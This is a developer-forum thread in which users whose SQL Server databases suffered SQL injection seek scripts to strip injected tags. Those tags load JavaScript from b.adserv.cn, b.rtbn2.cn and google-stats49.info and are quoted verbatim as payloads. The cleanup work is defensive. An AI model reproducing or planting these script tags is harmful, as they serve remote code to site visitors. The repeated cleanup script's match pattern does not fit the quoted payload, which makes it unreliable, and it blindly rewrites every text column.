I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>
any idea how to remove it without deleting the descrition?
Here is what I have
HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>
Here is what I need
HIM PORTRAIT SHIRT
3000 items / rows need to be cleaned up too much to do it manally!!!
Jump to PostDynamic SQL is very risky!!
Jump to PostDynamic SQL is very risky!!
I'm Sorry but this is totally not true because it depends on the person who wrote it
because in sql you should never ever ever do concatenation to make queries, you should use parametrized queries.
and if the columns or the tables were dynamic …
I found this but the colum is in text
DECLARE @sql NVARCHAR(4000)
DECLARE @InsertedValue NVARCHAR(1000)
SET @InsertedValue = 'The Script tags which were inserted'
DECLARE cur CURSOR FOR
select 'update [' + sysusers.name + '].[' + sysobjects.name + ']
set [' + syscolumns.name + '] = replace([' + syscolumns.name + '], ''' + @InsertedValue + ''', '''')'
from syscolumns
join sysobjects on syscolumns.id = sysobjects.id
and sysobjects.xtype = 'U'
join sysusers on sysobjects.uid = sysusers.uid
where syscolumns.xtype in (35, 98, 99, 167, 175, 231, 239, 241, 231)
OPEN cur
FETCH NEXT FROM cur INTO @sql
WHILE @@FETCH_STATUS = 0
BEGIN
exec (@sql)
FETCH NEXT FROM cur INTO @sql
END
CLOSE cur
DEALLOCATE curThis worked
use Your database name
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script></script>%'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Dynamic SQL is very risky!!
Dynamic SQL is very risky!!
I'm Sorry but this is totally not true because it depends on the person who wrote it
because in sql you should never ever ever do concatenation to make queries, you should use parametrized queries.
and if the columns or the tables were dynamic you should use quotename().
in SQL injection there is nothing to do with it in Dynamic SQL it all depends on how you wrote it.
You don't avoid injection just from application, but to run any code against the SP + it's not maintainable and this is the big risk in business application development, I'm sure for every scenario use think I must use dynamic SQL there's better solution by not it.
i have this sql injection
on my database
</title><script src=http://google-stats49.info/ur.php></script>
i want to remove it has affected almost all the tables
please let me know how this can be done thanks
Thanks
removing it manually will take lots of time
please let me know .
and also I would like to know how to stop further attach
Thanks
This worked
use Your database name DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update ['+@T+'] set ['+@C+'] = left( convert(varchar(8000), ['+@C+']), len(convert(varchar(8000), ['+@C+'])) - 6 - patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+']))) ) where ['+@C+'] like ''%<script></script>%''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor;
I have this attach on my database
</title><script src=http://google-stats49.info/ur.php></script>
please let me know what is the code and how to run it on enterprise edition
This worked
use Your database name DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update ['+@T+'] set ['+@C+'] = left( convert(varchar(8000), ['+@C+']), len(convert(varchar(8000), ['+@C+'])) - 6 - patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+']))) ) where ['+@C+'] like ''%<script></script>%''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor;
How did you run this please let me know
on sql enterprice manager please let me know
even I have the similar attach I would like to remove from my database also
Looking to hear form you
Thanks
We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.